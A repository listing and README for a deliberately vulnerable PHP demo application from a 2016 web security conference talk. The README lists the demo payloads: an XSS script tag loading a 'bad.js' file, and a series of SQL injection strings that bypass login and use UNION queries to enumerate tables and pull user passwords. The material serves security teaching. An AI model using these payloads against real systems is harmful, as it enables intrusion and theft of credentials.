The system I used for the demo in my Web Application Security talk at Akademik Bilişim 2016.
bootstrap
hack
inc
README.md
cikisyap.php
database.sql
footer.php
girisyap.php
header.php
index.php
uye.php
uyeler.php
uyeol.php

README.md

ab16WebUygulamaGuvenligi


Presentation: http://www.slideshare.net/Om3rCitak/web-uygulama-gvenlii-akademik-biliim-2016-57851287

Payloads Used in the Demo

XSS

<script src='http://127.0.0.1/demo_xss_sql/hack/bad.js'></script>

SQL Injection

' or true #

' and 1=1

' and 1=2

' order by 3

-{id} union select 1,2,3

-{id} union select 1,database(),3

-{id} union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='bitcs'

-{id} union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='bitcs' and table_name='users'

-{id} union select 1,password,3 from users where id=1

-{id} union select 1,password,3 from users where username='omercitak'